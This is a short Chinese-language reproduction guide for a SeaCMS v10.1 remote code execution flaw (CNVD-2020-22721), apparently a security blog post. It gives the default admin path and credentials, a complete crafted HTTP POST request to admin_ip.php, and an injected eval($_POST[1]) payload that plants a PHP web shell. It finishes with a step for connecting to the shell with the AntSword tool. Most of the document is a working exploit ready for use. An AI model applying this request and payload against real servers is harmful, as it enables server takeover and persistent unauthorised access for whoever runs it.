seacms 远程命令执行 （CNVD-2020-22721）漏洞复现

1.漏洞描述

        海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞，在w1aqhp/admin_ip.php下第五行使用set参数，对用户输入没有进行任何处理，直接写入文件。攻击者可利用该漏洞执行恶意代码，获取服务器权限。 后台路径：/manager 后台密码：admin:admin

2.打开后台

 3.系统-后台ip安全设置

 4.点击确认后抓确认包，改包

 

POST /manager/admin_ip.php?action=set HTTP/1.1
Host: ip:32541
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://ip:32541
Connection: close
Referer: http://ip:32541/manager/admin_ip.php
Cookie: _ga=GA1.1.45614267.1662015780; redirect=1; PHPSESSID=2t2rvd0gbggpp9vnq1ugo389g0
Upgrade-Insecure-Requests: 1

v=0&ip=+1233123231";eval($_POST[1]);//

5.浏览器执行后不报错，直接蚁剑连接

http://ip:32541/manager/admin_ip.php